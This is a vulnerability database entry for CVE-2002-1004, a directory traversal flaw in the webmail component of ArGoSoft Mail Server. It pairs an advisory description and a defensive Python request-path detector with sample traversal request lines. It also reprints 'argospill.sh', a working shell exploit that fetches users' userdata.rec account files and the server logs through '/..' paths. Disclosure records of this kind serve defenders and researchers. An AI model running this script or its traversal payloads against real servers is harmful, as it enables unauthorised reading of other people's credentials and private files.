ArGoSoft Mail Server Remote Directory Traversal Vulnerability

Vulnerability ID 1106833 Vulnerability type Unknown
Published 2002-07-06 Updated 2006-09-27
CVE ID CVE-2002-1004 CNNVD-ID CNNVD-200210-179
Platform Windows CVSS score 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/21591
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200210-179
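|Vulnerability details
ArGoSoft Mail Server is a system that integrates SMTP, POP3 and Fingerd services and includes a web server that lets remote users access their mail over the web. It runs on Microsoft Windows. The web service of ArGoSoft Mail Server does not properly filter URL requests submitted by users, and a remote attacker can exploit this flaw to carry out a directory traversal attack. Because the webmail server does not check for reverse directory traversal, an attacker can request an image or a legitimate user's attachment and submit a path that contains multiple '/..' sequences followed by the name of the system file to view, which discloses the contents of any requested system file with the privileges of the webmail service process. This vulnerability has been reproduced in ArGoSoft Mail Server 1.8.1.5; other versions may also be affected.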
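The missing check described above, seen from the defending side, as an added example that is not part of the original advisory or of ArGoSoft's code: it flags request paths in which a '..' segment climbs out of a served directory or above the web root. The directory set, the function names and the sample request lines are assumptions constructed from the paths that appear on this page.

```python
from urllib.parse import unquote

# Directories named in the request paths on this page. Treating them as the
# set of directories the web interface serves files from is an assumption.
SERVED_DIRS = {"images", "_tempatt"}

def decode_path(raw):
    """Drop the query string, then percent-decode until the path is stable."""
    raw = raw.split("?", 1)[0]
    for _ in range(4):  # catches %2e%2e and double-encoded %252e%252e
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    # The server runs on Windows, where '\' separates path segments too.
    return raw.replace("\\", "/")

def escapes_served_dir(raw_path):
    """True if a '..' segment leaves a served directory or the web root."""
    stack = []
    for seg in decode_path(raw_path).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack or stack[-1].lower() in SERVED_DIRS:
                return True
            stack.pop()  # '..' inside a subdirectory is harmless
        else:
            stack.append(seg)
    return False

def flag_requests(request_lines):
    """Return the 'METHOD path PROTOCOL' lines whose path escapes."""
    return [line for line in request_lines
            if len(line.split()) >= 2 and escapes_served_dir(line.split()[1])]

# Constructed sample request lines (not captured traffic).
SAMPLE = [
    "GET /images/logo.gif HTTP/1.0",
    "GET /images/sub/../logo.gif HTTP/1.0",
    "GET /images/../_logs/2002-07-05.txt HTTP/1.0",
    "GET /_users/test.com/me/_tempatt/../userdata.rec HTTP/1.0",
    "GET /me/_tempatt/%2e%2e/userdata.rec HTTP/1.0",
    "GET /images/..%5c_logs%5c2002-07-05.txt HTTP/1.0",
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE):
        print("traversal:", hit)
```

A check that only confines requests to the web root would pass several of these paths, because a single '..' out of `images` or `_tempatt` still resolves inside the root.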
|Exploit
source: http://www.securityfocus.com/bid/5144/info

ArGoSoft Mail Server is an SMTP, POP3 and Finger server for Microsoft Windows environments. ArGoSoft has a built-in web server to enable remote access to mail.

A directory traversal issue has been reported in the web server, which could allow remote users access to all files residing on the host.

This is accomplished by submitting a specially crafted request containing '/..' character sequences to a specific directory.

This issue is reported to exist in ArGoSoft Mail Server 1.8.1.5; earlier versions may also be affected by this issue.


#!/bin/sh
#
# released on 06/07/2002 by team n.finity <nfinity@gmx.net>
# find us at http://nfinity.yoll.net/
#
# argospill.sh

HOST=$1
USER=$2
DOMAIN=$3

startpro()
{
    echo -e "\nSpilling user $USER @ $DOMAIN, host $HOST (Pro)\n"
    URL=/_users/$DOMAIN/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startplus()
{
    echo -e "\nSpilling user $USER, host $HOST (Plus)\n"
    URL=/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startboth()
{
    echo -e "\nSpilling host $HOST (Plus / Pro)\n"
    URL=/images/../_logs/`date -d '-1 day' +%Y-%m-%d`.txt
    /usr/bin/lynx -dump http://$HOST$URL
}

usage()
{
    echo -e "\nUsage:\n"
    echo "Both - $0 <host>"
    echo "Pro  - $0 <host> <user> <domain>"
    echo "Plus - $0 <host> <user>"
    echo -e "\nExample:\n"
    echo "Both, images dir - $0 www.test.com"
    echo "Plus, no dom req - $0 www.test.com me"
    echo "Pro, default dom - $0 www.test.com me _nodomain"
    echo "Pro, virtual dom - $0 www.test.com me test.com"
}

echo "Argospill 1.0 by Team N.finity"

if [ -n "$HOST" ]; then
    if [ -n "$USER" ]; then
        if [ -n "$DOMAIN" ]; then
            startpro
        else
            startplus
        fi
    else
        startboth
    fi
else
    usage
fi
|References

Source: BID
Name: 5144
Link: http://www.securityfocus.com/bid/5144
Source: XF
Name: argosoft-dotdot-directory-traversal(9477)
Link: http://www.iss.net/security_center/static/9477.php
Source: www.argosoft.com
Link: http://www.argosoft.com/applications/mailserver/changelist.asp
Source: BUGTRAQ
Name: 20020703 Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal
Link: http://archives.neohapsis.com/archives/bugtraq/2002-07/0029.html